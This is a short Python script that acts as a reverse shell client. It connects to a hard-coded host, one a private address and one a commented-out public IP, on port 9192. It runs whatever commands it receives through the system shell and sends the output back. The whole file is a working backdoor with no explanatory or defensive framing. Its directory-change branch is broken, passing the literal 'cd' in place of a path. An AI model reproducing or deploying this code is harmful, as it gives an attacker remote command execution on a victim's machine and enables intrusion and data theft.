import socket
import os
import subprocess


s = socket.socket()
host = '192.168.0.101'
#host = '3.17.167.53'
port = 9192

s.connect((host,port))

while True:
    data = s.recv(1024)
    if data[:2].decode('utf-8') == 'cd':
        os.chdir(data[:2].decode('utf-8'))

    elif len(data) > 0:
        cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
        output_byte = cmd.stdout.read() + cmd.stderr.read()
        output_str = str(output_byte,'utf-8')
        path = os.getcwd() + '/ '
        s.send(str.encode(output_str + path))

        print(output_str)

